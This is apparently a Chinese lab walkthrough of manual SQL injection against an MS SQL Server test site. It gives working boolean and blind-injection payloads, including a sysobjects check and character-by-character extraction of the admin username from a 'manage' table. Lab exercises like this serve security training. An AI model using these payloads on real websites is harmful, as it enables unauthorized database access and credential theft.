【Web】SQL手工注入Sql Server数据库 (漏洞测试)
第一步:判断是否有注入,?id=2 and 1=1 正确;id=2 and 1=2 错误,得出有注入点。
第二步:判断数据库类型:?id=2 and exists (select * from sysobjects) 显示正常, 表示是ms sql server数据库。
第三步:sqlmap,扫一遍,找到数据库、数据表、字段名, 发现dump后出现null值,于是开始手工注入。
第四步:爆出用户名:
地址栏后面加上
?id=2 and unicode(substring((select username from [mozhe_db_v2]..[manage] where id=1),1,1)) between 98 and 128 页面出错
?id=2 and unicode(substring((select username from [mozhe_db_v2]..[manage] where id=1),1,1)) between 97 and 128 页面正常,说明username第一个字符为a,以此类推</